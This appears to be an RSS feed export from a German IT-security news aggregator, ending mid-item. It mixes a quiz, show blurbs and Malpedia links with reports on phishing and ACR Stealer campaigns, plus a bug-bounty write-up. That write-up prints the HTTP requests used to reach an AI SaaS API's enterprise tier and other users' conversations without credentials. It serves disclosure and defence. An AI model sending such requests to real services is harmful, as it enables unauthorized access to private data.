<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=nick+fitzgerald+structureaware+fuzzing%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 18:37:27 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 18:37:27 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=nick+fitzgerald+structureaware+fuzzing%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=nick+fitzgerald+structureaware+fuzzing%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[What links Horrible Histories and Gordon Brown’s neighbour? The bumper summer quiz]]></title>
<description><![CDATA[From award-winning Julies to golfers who were nearly the best, test your knowledge with this bumper summer quiz1 What is now the world’s most populous city, according to the UN?2 Which two Julies won best actress Oscars in consecutive years?3 What was thrown by the goddess Eris at the wedding of ...]]></description>
<link>https://tsecurity.de/de/3695219/it-nachrichten/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695219/it-nachrichten/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz/</guid>
<pubDate>Sun, 26 Jul 2026 08:15:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>From award-winning Julies to golfers who were nearly the best, test your knowledge with this bumper summer quiz</p><p><strong>1</strong> What is now the world’s most populous city, according to the UN?<br><strong>2</strong> Which two Julies won best actress Oscars in consecutive years?<br><strong>3</strong> What was thrown by the goddess Eris at the wedding of Peleus and Thetis?<br><strong>4</strong> Richard Nixon appeared a record 55 times on the cover of what?<br><strong>5</strong> What became Britain’s tallest structure in 1894?<br><strong>6</strong> Mojang Studios in Sweden is renowned for developing which video game?<br><strong>7</strong> Which golfer spent 270 weeks as world No 2, but never reached No 1?<br><strong>8</strong> Which “The” group, named after a Camus novel, went through over 65 members?<br><strong>9</strong> Who is the subject of Alberto Korda’s photograph Guerrillero Heroico?<br><strong>10</strong> What defines an Olimpico goal in football?<br><strong>11</strong> Who initiated the Fridays for Future school strikes?<br><strong>12</strong> Which British dynasty is commemorated by a monument in St Peter’s Basilica?<br><strong>13</strong> What type of souvenir was invented in Vienna in 1900?<br><strong>14</strong> Which Norwegian island gives its name to two shipping forecast areas?<br><strong>15</strong> Which art museum employs a colony of cats to protect it from rodents?<br><strong>16</strong> Millvina Dean, who died in 2009, was the last living survivor of what?<br><strong>What</strong> <strong>links:<br>
  17</strong> Arrival of spring; double portraits; swimming pools; Grand Canyon; Yorkshire landscape?<br><strong>18</strong> Mozart &amp; Franz Süssmayr; Landseer &amp; Millais; F Scott Fitzgerald &amp; Edmund Wilson?<br><strong>19</strong> Cordelia, Goneril &amp; Regan; Imogen; Marina?<br><strong>20</strong> Britannia (1717-1936); Golden Hind (1937-69); St Edward’s Crown (1971-84)?<br><strong>21</strong> Alba white truffles; Pule cheese; Wagyu beef; Yubari King melons?<br><strong>22</strong> Matt Damon; Robert Frost; Bill Gates; Bonnie Raitt; Mark Zuckerberg?<br><strong>23</strong> Horrible Histories; glucose; Gordon Brown’s neighbour; King-Smith’s swine; winter squash?<br><strong>24</strong> Mount Whitney in California and Mulhacén in Andalucía?<br><strong>25</strong> 1991 defence of Baghdad; nacre; UK parliament; Virginia?<br><strong>26</strong> Carrying a double bass; missing a bus; walking two dogs; wearing a cowboy hat; winding a clock?<br><strong>27</strong> 2 (1st); 29 (10th); 541 (100th); 7,919 (1,000th); 104,729 (10,000th)?<br><strong>28</strong> Ant; bull; cuckoo; eagle; shower of gold; swan?<br><strong>29</strong> Zlín, Czechoslovakia; Cohutta, US; Novo Mesto, Yugoslavia?<br><strong>30</strong> Drowned; large bread; pick me up; half cold?</p> <a href="https://www.theguardian.com/games/2026/jul/26/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Department of Know: OpenAI hacks Hugging Face, Chinese LLM ban, Kratos takedown]]></title>
<description><![CDATA[This week’s Department of Know is hosted by Rich Stroffolino, with guests Nick Espinosa, host, Deep Dive Radio Show, and Dennis Pickett, vp, CISO, Westat. Missed the live show? Check it out on YouTube. The Department of Know is live…
Read more →
The post The Department of Know: OpenAI hacks Huggi...]]></description>
<link>https://tsecurity.de/de/3692621/it-security-nachrichten/the-department-of-know-openai-hacks-hugging-face-chinese-llm-ban-kratos-takedown/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692621/it-security-nachrichten/the-department-of-know-openai-hacks-hugging-face-chinese-llm-ban-kratos-takedown/</guid>
<pubDate>Fri, 24 Jul 2026 23:39:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s Department of Know is hosted by Rich Stroffolino, with guests Nick Espinosa, host, Deep Dive Radio Show, and Dennis Pickett, vp, CISO, Westat. Missed the live show? Check it out on YouTube. The Department of Know is live…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-department-of-know-openai-hacks-hugging-face-chinese-llm-ban-kratos-takedown/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-department-of-know-openai-hacks-hugging-face-chinese-llm-ban-kratos-takedown/">The Department of Know: OpenAI hacks Hugging Face, Chinese LLM ban, Kratos takedown</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TA488 Targets Zimbra Mailservers with Half-Click Exploits]]></title>
<description><![CDATA[2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.zimreaper
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691729/malware-trojaner-viren/ta488-targets-zimbra-mailservers-with-half-click-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691729/malware-trojaner-viren/ta488-targets-zimbra-mailservers-with-half-click-exploits/</guid>
<pubDate>Fri, 24 Jul 2026 15:57:49 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.zimreaper
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/ac65e9d1-1b9c-4b00-bc82-b9dff4fbe0ee/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation RoundPress Rolls on with More Half-Click Webmail Zero-Days from TA458]]></title>
<description><![CDATA[2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.spypress
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3691728/malware-trojaner-viren/operation-roundpress-rolls-on-with-more-half-click-webmail-zero-days-from-ta458/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691728/malware-trojaner-viren/operation-roundpress-rolls-on-with-more-half-click-webmail-zero-days-from-ta458/</guid>
<pubDate>Fri, 24 Jul 2026 15:57:40 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-23 • Proofpoint
     • Greg Lesnewich, Konstantin Klinger, Mark Kelly, Nick Attfield, Saher Naumaan
     • js.spypress
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/e20a8ecb-9634-413c-bd30-90d6852d9287/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Clone Microsoft Login Portals to Capture Credentials and Session Tokens in Real Time]]></title>
<description><![CDATA[An active adversary-in-the-middle (AiTM) phishing campaign that clones Microsoft authentication pages to intercept credentials, Multi-Factor Authentication (MFA) codes, and session tokens in real time. Rather than relying on simple password harvesting, this technique hijacks authenticated user se...]]></description>
<link>https://tsecurity.de/de/3685913/it-security-nachrichten/hackers-clone-microsoft-login-portals-to-capture-credentials-and-session-tokens-in-real-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685913/it-security-nachrichten/hackers-clone-microsoft-login-portals-to-capture-credentials-and-session-tokens-in-real-time/</guid>
<pubDate>Wed, 22 Jul 2026 12:14:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An active adversary-in-the-middle (AiTM) phishing campaign that clones Microsoft authentication pages to intercept credentials, Multi-Factor Authentication (MFA) codes, and session tokens in real time. Rather than relying on simple password harvesting, this technique hijacks authenticated user sessions directly. Detailed by Infoblox Threat Intel researchers Darby Wise and Nick Sundvall, the widespread campaign has targeted universities, […]</p>
<p>The post <a href="https://gbhackers.com/hackers-clone-microsoft-login-portals/">Hackers Clone Microsoft Login Portals to Capture Credentials and Session Tokens in Real Time</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New ACR Stealer campaigns use WebDAV, MSHTA to evade detection]]></title>
<description><![CDATA[Microsoft has issued a warning about a recent surge in ACR Stealer activity that uses ClickFix-style social engineering to steal credentials, browser data, and sensitive business documents.



In a new report, Microsoft researchers detailed two separate campaigns observed between late April and m...]]></description>
<link>https://tsecurity.de/de/3681119/it-security-nachrichten/new-acr-stealer-campaigns-use-webdav-mshta-to-evade-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681119/it-security-nachrichten/new-acr-stealer-campaigns-use-webdav-mshta-to-evade-detection/</guid>
<pubDate>Mon, 20 Jul 2026 14:38:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has issued a warning about a recent surge in ACR Stealer activity that uses ClickFix-style social engineering to steal credentials, browser data, and sensitive business documents.</p>



<p class="wp-block-paragraph">In a new report, Microsoft researchers detailed two separate campaigns observed between late April and mid-June 2026 that use different execution techniques for the same theft.</p>



<p class="wp-block-paragraph">The campaign was seen tricking users into executing malicious commands to resolve a fake issue. Once the malware is executed, it extracts browser-stored credentials, session tokens, and documents, which can potentially allow attackers to access cloud services, impersonate users, and conduct follow-on intrusions across enterprise environments.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/nicholas-tausek-6ab41611/" target="_blank" rel="noreferrer noopener">Nick Tausek</a>, lead security automation architect at Swimlane, thinks attackers could be using two distinct chains to trick defense tuned on individual indicators.  “By changing the delivery and execution patterns, attackers can evade defenses tuned to one known chain and make related incidents appear disconnected,“ he said. “Security teams may split the activity across separate investigations, delaying recognition of the shared malware and objective.”</p>



<p class="wp-block-paragraph">ACR Stealer is an information-stealing malware family Microsoft believes is offered through a malware-as-a-service (<a href="https://www.csoonline.com/article/4148601/chrome-abe-bypass-discovered-new-voidstealer-malware-steals-passwords-and-cookies.html">MaaS</a>) model, with possible links to the Amatera Stealer.</p>



<h2 class="wp-block-heading">WebDAV and MSHTA-based chains</h2>



<p class="wp-block-paragraph">Although both campaigns begin with ClickFix lures, Microsoft’s analysis shows they diverge after initial execution. One attack chain uses <a href="https://www.csoonline.com/article/530692/data-protection-webdav-is-bad-says-security-researcher.html">WebDAV</a>-hosted DLLs, PowerShell, Python loaders, scheduled-task persistence, and even blockchain-based infrastructure called the “EtherHiding” technique, to complicate detection and command and control (C2) discovery.</p>



<p class="wp-block-paragraph">The second chain uses <a href="https://www.csoonline.com/article/4173096/internet-explorer-may-be-dead-but-its-ghost-still-runs-malware.html">MSHTA</a>, heavily obfuscated PowerShell, stenography, and predominantly fileless, in-memory execution to minimize forensic trails.</p>



<p class="wp-block-paragraph">“The most troubling part of ACR Stealer is the flexibility surrounding the theft. One chain invests in persistence and layered infrastructure, while the other favors memory execution and fewer forensic traces,” Tausek said. “Those approaches look different to defenders, yet both turn a simple ClickFix lure into stolen credentials, tokens, and business documents.”</p>



<p class="wp-block-paragraph">Microsoft researchers said protections against these campaigns have now been added to Defender. “Microsoft Defender for Endpoint can help surface both campaigns through behavioral coverage for living-off-the-land execution, suspicious WebDAV and MSHTA activity, obfuscated PowerShell, scheduled-task persistence, in-memory payload execution, and browser credential theft,” they <a href="https://www.microsoft.com/en-us/security/blog/2026/07/16/acr-stealer-two-observed-intrusion-chains-amid-increased-threat-activity/" target="_blank" rel="noreferrer noopener">said</a>.</p>



<h2 class="wp-block-heading">Mitigations include ClickFix-targeted detections</h2>



<p class="wp-block-paragraph">The report highlighted that neither of the campaigns exploits any software vulnerability, depending solely on ClickFix-based social engineering.</p>



<p class="wp-block-paragraph">Microsoft warned its Defender customers that ClickFix attacks <a href="https://www.csoonline.com/article/4016208/sixfold-surge-of-clickfix-attacks-threatens-corporate-defenses.html">are on the rise</a> and shared XDR queries to identify suspicious commands executed through ClickFix-based activity observed while delivering the ACR Stealer.</p>



<p class="wp-block-paragraph">Microsoft also recommended, as general defense, monitoring for suspicious PowerShell activity, MSHTA execution, WebDAV connections, and attempts to access browser credential stores, while also enabling Microsoft Defender SmartScreen and Attack Surface Reduction (ASR) rules to block common malware delivery techniques.</p>



<p class="wp-block-paragraph">“The campaigns do not need to directly aid one another to be effective. Together, they create ambiguity and stretch limited SOC resources,” Tausek explained. Security teams need enough visibility to correlate endpoint, identity, and network activity as one evolving intrusion, he added.</p>



<p class="wp-block-paragraph">Microsoft also shared a list of C2 addresses and payload hosting domains for defenders to add to their detection.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[California's 'Truth in Recycling' Law Blocked by Judge]]></title>
<description><![CDATA[An anonymous reader shared this report from the Los Angeles Times:

A federal judge has halted California's groundbreaking "Truth in Recycling" law, which aims to reduce consumer confusion about which packaging can be recycled. [Originally planned to take effect October 4th], California's recycla...]]></description>
<link>https://tsecurity.de/de/3680013/it-security-nachrichten/californias-truth-in-recycling-law-blocked-by-judge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680013/it-security-nachrichten/californias-truth-in-recycling-law-blocked-by-judge/</guid>
<pubDate>Sun, 19 Jul 2026 23:22:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader shared this report from the Los Angeles Times:

A federal judge has halted California's groundbreaking "Truth in Recycling" law, which aims to reduce consumer confusion about which packaging can be recycled. [Originally planned to take effect October 4th], California's recyclable packaging law prohibits manufacturers from using a "chasing arrows" recycling symbol on products or materials unless they are actually being recycled in a meaningful way, which the law quantifies... 

A coalition of farming, forestry, restaurant and packaging organizations sued the state in March, arguing the law violates their right to free speech. They argued that Senate Bill 343 operates as "government-imposed censorship." Judge William Hayes agreed that their challenge has merit, and on Tuesday ordered California Atty. Gen. Rob Bonta, the defendant in the case, to pause enforcement of the law "until further order of the Court...." Advocates of reducing plastic use disagreed. "The court got it wrong, and I'm confident that the state will ultimately prevail," said Nick Lapis, director of advocacy for Californians Against Waste. "S.B. 343 does not violate the 1st Amendment; it requires companies to tell the truth when they make recyclability claims. Suggesting that the 1st Amendment protects misleading environmental marketing is inconsistent with the basic principles of consumer protection that states like California have implemented for decades." 


In January, CalRecycle, the state's waste agency, reported that less than 10% of most single-use plastic materials in the state were being recycled. Even yogurt containers and margarine tubs — made of ubiquitous polypropylene, or No. 5 plastic — are being recycled at a rate of only 2% in the state, the report said. Only 5% of colored shampoo and detergent bottles, made from polyethylene, or No. 1 plastic, are getting recycled... 

Plastic materials that can't be recycled are typically sent to landfills or sometimes illegally shipped overseas, where they are burned or end up in landfills, rivers and waterways.


 
The bill's author told the Los Angeles Times "All you have to do is look at the numbers. These products are not getting recycled, despite what the industry is claiming. They are just confusing consumers, clogging the waste stream, polluting the environment, leading to higher and higher prices for local governments and ratepayers." He argues the symbols shouldn't be used to "confuse people who see the symbols [on products] and assume they can be recycled." 

The article also quotes Judith Enck, former Environmental Protection Agency regional administrator and president of the nonprofit Beyond Plastics. "Given the long history of the plastics industry deceiving the public about plastics recycling, this is an especially bad outcome. It is a reminder that the plastics industry has enough money to fight even the most modest policy designed to protect people and the planet."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=California's+'Truth+in+Recycling'+Law+Blocked+by+Judge%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F19%2F210221%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F19%2F210221%2Fcalifornias-truth-in-recycling-law-blocked-by-judge%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/19/210221/californias-truth-in-recycling-law-blocked-by-judge?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[An Introduction to Automated Software Testing using Symbolic Execution (hackover2026)]]></title>
<description><![CDATA[This talk provides a foundational introduction to symbolic execution. Symbolic execution is an automated software testing technique that enumerates all reachable execution paths through a software under test. An execution path is a sequence of Boolean values specifying which branch was taken, for...]]></description>
<link>https://tsecurity.de/de/3677870/it-security-video/an-introduction-to-automated-software-testing-using-symbolic-execution-hackover2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677870/it-security-video/an-introduction-to-automated-software-testing-using-symbolic-execution-hackover2026/</guid>
<pubDate>Sat, 18 Jul 2026 13:03:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This talk provides a foundational introduction to symbolic execution. Symbolic execution is an automated software testing technique that enumerates all reachable execution paths through a software under test. An execution path is a sequence of Boolean values specifying which branch was taken, for every branch point in the tested software. As program execution diverts at branch points, reasoning about execution paths is vital for software testing.

To enumerate execution paths, symbolic execution formally reasons about the satisfiability of branch conditions. Therefore, in contrast to other automated testing techniques (e.g., fuzzing), it takes the program structure into account and thus goes beyond bug finding, enabling us to prove properties about the tested code. That is, show that they hold on all reachable execution paths. This presentation will explain how symbolic execution works under the hood and illustrate its outlined capabilities using a practical example.

Slides and demo material available via: &lt;https://github.com/nmeum/symex-intro&gt;.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://talks.hackover.de/ho26/talk/CKUL8T/]]></content:encoded>
</item>
<item>
<title><![CDATA[A nightmare on Windows street.]]></title>
<description><![CDATA[Nightmare Eclipse drops another Windows zero-day. The Gentlemen take the ransomware crown. CISA orders emergency Fortinet patching. Canada’s surveillance bill faces U.S. scrutiny. Meta’s Oversight Board flags AI censorship bias. Commerce tops the cyber target list. An active espionage campaign hi...]]></description>
<link>https://tsecurity.de/de/3677000/it-security-nachrichten/a-nightmare-on-windows-street/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677000/it-security-nachrichten/a-nightmare-on-windows-street/</guid>
<pubDate>Fri, 17 Jul 2026 22:35:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nightmare Eclipse drops another Windows zero-day. The Gentlemen take the ransomware crown. CISA orders emergency Fortinet patching. Canada’s surveillance bill faces U.S. scrutiny. Meta’s Oversight Board flags AI censorship bias. Commerce tops the cyber target list. An active espionage campaign hits Bangladesh’s military. The Hewlett Foundation commits $100 million to emerging tech security. And U.S. prosecutors dismantle an alleged cyber-enabled money laundering network. Our guest is Nick Stohlman, Vice President of CJIS Strategy at Imprivata, talking about CJIS readiness and the identity security challenges facing public safety agencies. Leaked source code reveals an AI mixtape.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero Credentials, Full Access: Inside a Complete Authorization Failure]]></title>
<description><![CDATA[Bounty Case Files #01How multiple trust-boundary failures allowed anonymous access to premium functionality in a production APIBy Ahmed Waleed | Bug Bounty HunterTL;DRWhile assessing a public enterprise SaaS API, I discovered a complete breakdown of authentication and authorization.By chaining mu...]]></description>
<link>https://tsecurity.de/de/3675345/hacking/zero-credentials-full-access-inside-a-complete-authorization-failure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675345/hacking/zero-credentials-full-access-inside-a-complete-authorization-failure/</guid>
<pubDate>Fri, 17 Jul 2026 09:23:35 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Bounty Case Files #01</h3><p><em>How multiple trust-boundary failures allowed anonymous access to premium functionality in a production API</em></p><p><strong>By </strong><a href="https://www.linkedin.com/in/0x-elfateh/"><strong>Ahmed Waleed</strong> </a><em>| Bug Bounty Hunter</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZT6QyTKTXT-HRslY4EAt4A.png"></figure><h3>TL;DR</h3><p>While assessing a public enterprise SaaS API, I discovered a complete breakdown of authentication and authorization.</p><p>By chaining multiple trust-boundary failures, an unauthenticated attacker could:</p><ul><li><em>Access premium enterprise functionality without authentication.</em></li><li>Impersonate arbitrary users</li><li>Read private conversation history</li><li>Escalate privileges through client-controlled authorization metadata.</li><li>Create, modify, and delete server-side resources</li></ul><p>To respect responsible disclosure, all identifying information has been removed.</p><h3>Target Overview</h3><p>The target was a public AI-powered enterprise platform exposing a documented REST API.</p><p>During reconnaissance I discovered several publicly accessible endpoints:</p><ul><li>/docs</li><li>/redoc</li><li>/openapi.json</li></ul><p>The OpenAPI specification described every available endpoint together with request schemas.</p><p>One thing immediately stood out: the API defined no authentication mechanism whatsoever — no API keys, no OAuth, no Bearer tokens, and no securitySchemes in the OpenAPI specification.</p><h3>Recon</h3><p>Rather than fuzzing hundreds of endpoints, I started by understanding how the application expected clients to communicate.</p><p>The Swagger interface exposed the complete API surface, allowing quick identification of authentication requirements — or in this case, the absence of them. That observation became the starting point for the entire assessment.</p><h3>Technical Walkthrough</h3><p>All requests below were run from a clean browser session with zero credentials, against only a test conversation and a synthetic (non-existent) email address.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/491/1*iFz52SiCWmXCxndPz_Ygog@2x.jpeg"></figure><p><strong>1. Create a conversation — no auth required:</strong></p><pre>POST /conversations<br>Content-Type: application/json <br>{}<br><br><br>→ 200 OK<br>{"status":"success","conversation_id":"conv_...","created_at":"..."}</pre><p><strong>2. Run an enterprise-tier query by just claiming to be enterprise:</strong></p><pre>POST /process<br>Content-Type: application/json<br><br>{<br>  "message": "Show me top brands in TVs on Amazon US by market share",<br>  "conversation_id": "conv_...",<br>  "user_metadata": {<br>    "user_tier": "enterprise",<br>    "permitted_categories": ["All"],<br>    "allowed_retailers": ["All"]<br>  }<br>}<br><br>→ 200 OK — real production analytics data returned, e.g.:<br>Brand A - 35.54% market share - $36.9M GMV - 47,832 units<br>Brand B - 17.81% market share - $18.5M GMV -  8,859 units<br>Brand C -  7.77% market share -  $8.1M GMV - 43,218 units<br></pre><p>The response even included an internal data-source citation confirming it was pulling from the platform’s proprietary intelligence pipeline — not a demo/sandboxed dataset.</p><p><strong>3. Impersonate any customer by email:</strong></p><pre>GET /conversations?user_email=&lt;any-email&gt;<br><br>→ 200 OK — full conversation history for that email address returnedGET /conversations?user_email=&lt;any-email&gt;</pre><p>No verification that the requester <em>is</em> that email address — just supply it and read their history.</p><p>Expected behavior for all three: 401 Unauthorized. Actual: 200 OK, full access.</p><h3><strong>Attack Chain</strong></h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ASZz1mQmnl81UjJjru3pZw.png"></figure><p>Individually, each issue represented a security weakness. Combined, they resulted in a complete authorization failure.</p><h3>Root Cause Analysis</h3><ul><li>Authentication was never enforced</li><li>User identity was trusted from client input</li><li>Authorization relied on client-controlled metadata</li><li>Public API documentation exposed the full attack surface</li><li>Critical authorization decisions occurred entirely on the client side</li></ul><h3>Impact</h3><p>An unauthenticated, remote, anonymous attacker could:</p><ul><li>Consume a paid AI analytics product with zero subscription</li><li>Pull real-time competitive intelligence (pricing, market share, revenue) meant to be a paid enterprise product</li><li>Enumerate/guess customer emails to read private conversation histories</li><li>Escalate from a “demo” tier to “enterprise” by editing a JSON field</li><li>Perform unauthenticated DELETE and PATCH on other users' conversation records — a data-integrity/destruction risk, not just a confidentiality one</li></ul><h3>Suggested Remediation</h3><ol><li>Require real authentication (e.g., validated OAuth/OIDC bearer tokens) on every endpoint; reject unauthenticated calls with 401.</li><li>Derive user identity <strong>only</strong> from the validated token — never from a client-supplied user_email parameter.</li><li>Enforce subscription tier and all permissions <strong>server-side</strong>, from the authenticated principal’s actual entitlements — never trust client-supplied user_metadata.</li><li>Remove or gate /docs, /redoc, and /openapi.json behind auth in production.</li><li>Add per-user rate limiting and audit logging tied to the authenticated identity.</li></ol><h3>Lessons Learned</h3><ul><li>Authentication and authorization solve different problems</li><li>Public API documentation accelerates reconnaissance</li><li>Client-controlled metadata must never influence authorization</li><li>Every permission should be verified on the server</li><li>Multiple low-complexity issues can combine into a critical compromise</li></ul><h3>Responsible Disclosure</h3><p>This issue was reported responsibly through the vendor’s vulnerability disclosure process. The article intentionally omits identifying details, implementation-specific information, and production artifacts.</p><h3>Takeaway</h3><p>An OpenAPI spec with no securitySchemes block and a Swagger UI with no "Authorize" button is a five-second tell that a supposedly "enterprise-grade" AI product may have no server-side authorization at all — identity and entitlement were both being trusted from client-supplied JSON. Worth checking on any AI agent/chatbot API you test: does the <em>server</em> actually verify who you are and what you're allowed to see, or is it just trusting what you tell it?</p><blockquote><em>Next in this series: Bounty Case Files #02</em></blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1607f0cf12ca" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/zero-credentials-full-access-inside-a-complete-authorization-failure-1607f0cf12ca">Zero Credentials, Full Access: Inside a Complete Authorization Failure</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Heartstopper Forever is the best farewell that fans could have hoped for as new Netflix movie makes Nick and Charlies the most vulnerable — and adult — they've ever been]]></title>
<description><![CDATA[Nobody wanted Nick and Charlie's love story to end, but new Netflix movie Heartstopper Forever does a more poignant job at saying goodbye than a season 4 ever could.]]></description>
<link>https://tsecurity.de/de/3675275/it-nachrichten/heartstopper-forever-is-the-best-farewell-that-fans-could-have-hoped-for-as-new-netflix-movie-makes-nick-and-charlies-the-most-vulnerable-and-adult-theyve-ever-been/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675275/it-nachrichten/heartstopper-forever-is-the-best-farewell-that-fans-could-have-hoped-for-as-new-netflix-movie-makes-nick-and-charlies-the-most-vulnerable-and-adult-theyve-ever-been/</guid>
<pubDate>Fri, 17 Jul 2026 09:03:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nobody wanted Nick and Charlie's love story to end, but new Netflix movie Heartstopper Forever does a more poignant job at saying goodbye than a season 4 ever could.]]></content:encoded>
</item>
<item>
<title><![CDATA[Heartstopper Forever ending explained: are Nick and Charlie still together, who breaks up, Easter eggs you might have missed and where the gang will end up next]]></title>
<description><![CDATA[Nick and Charlie's love story has finally been brought to a close in new Netflix movie Heartstopper Forever. Here's the answer to every question you're going to want answered.]]></description>
<link>https://tsecurity.de/de/3675274/it-nachrichten/heartstopper-forever-ending-explained-are-nick-and-charlie-still-together-who-breaks-up-easter-eggs-you-might-have-missed-and-where-the-gang-will-end-up-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675274/it-nachrichten/heartstopper-forever-ending-explained-are-nick-and-charlie-still-together-who-breaks-up-easter-eggs-you-might-have-missed-and-where-the-gang-will-end-up-next/</guid>
<pubDate>Fri, 17 Jul 2026 09:03:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
